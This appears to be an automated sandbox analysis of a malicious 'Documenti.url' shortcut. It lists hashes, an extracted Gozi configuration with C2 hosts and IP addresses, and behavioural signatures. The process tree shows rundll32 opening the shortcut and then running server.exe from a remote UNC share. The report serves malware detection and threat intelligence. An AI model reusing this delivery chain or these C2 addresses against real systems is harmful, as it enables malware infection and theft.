Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
22/03/2023, 07:23
Static task
static1
Behavioral task
behavioral1
Sample
Documenti/Documenti.url
Resource
win7-20230220-en
General
-
Target
Documenti/Documenti.url
-
Size
194B
-
MD5
1b6b88b4f8da87f1524d77166c9a01dd
-
SHA1
a4abf24eda19bf997e2de103c6d0cb3675f225e0
-
SHA256
5ed9e8b1e7ca4c6ecce0929514d0f195d4202809a3e933e06f2af0f7eba53d8b
-
SHA512
5de1d7a44aa0cea83bc48feaadb712779f1971878d839ab0cf1c310cc40391ea0c6660a939a90c94a1d1f4f5a465bbd746533c3f34b68f2bde5a8d0ed883d04d
Malware Config
Extracted
gozi
7715
checklist.skype.com
62.173.142.50
31.41.44.87
109.248.11.217
212.109.218.151
5.44.45.83
62.173.142.81
193.233.175.113
109.248.11.184
212.109.218.26
185.68.93.7
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1560 wrote to memory of 2560 1560 rundll32.exe 87 PID 1560 wrote to memory of 2560 1560 rundll32.exe 87 PID 1560 wrote to memory of 2560 1560 rundll32.exe 87
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Documenti\Documenti.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1560 -
\??\UNC\109.248.11.226\Agenzia\server.exe"\\109.248.11.226\Agenzia\server.exe"2⤵PID:2560
-